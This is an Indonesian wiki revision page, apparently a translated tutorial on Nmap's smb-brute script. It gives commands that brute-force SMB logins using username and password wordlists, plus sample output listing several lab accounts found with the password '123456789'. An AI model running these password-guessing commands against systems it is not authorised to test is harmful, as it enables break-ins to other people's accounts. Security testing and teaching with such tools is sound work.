Difference between revisions of "Nmap: brute force hack smb password"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 9: | Line 9: | ||
==User Summary== | ==User Summary== | ||
− | Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. | + | Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. Script ini memeriksa password dengan secara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelum Vista. |
==Contoh Penggunaan== | ==Contoh Penggunaan== |
Latest revision as of 10:12, 23 April 2020
Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html
File smb-brute
Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse
User Summary
Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. Script ini memeriksa password dengan secara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelum Vista.
Contoh Penggunaan
nmap --script smb-brute.nse -p445 <host> sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105
contoh
nmap --script smb-brute.nse -p445 192.168.0.7 nmap --script smb-brute.nse -p445 192.168.0.80 nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80 Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
Contoh Output
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB Nmap scan report for 192.168.0.7 Host is up (0.0045s latency). Not shown: 989 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 873/tcp open rsync 8873/tcp open dxspider 9001/tcp open tor-orport 9050/tcp open tor-socks 9090/tcp open zeus-admin 22939/tcp open unknown MAC Address: 4C:E6:76:1F:15:4C (Buffalo) Host script results: | smb-brute: | derry:123456789 => Valid credentials | onno:123456789 => Valid credentials |_ reza:123456789 => Valid credentials Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds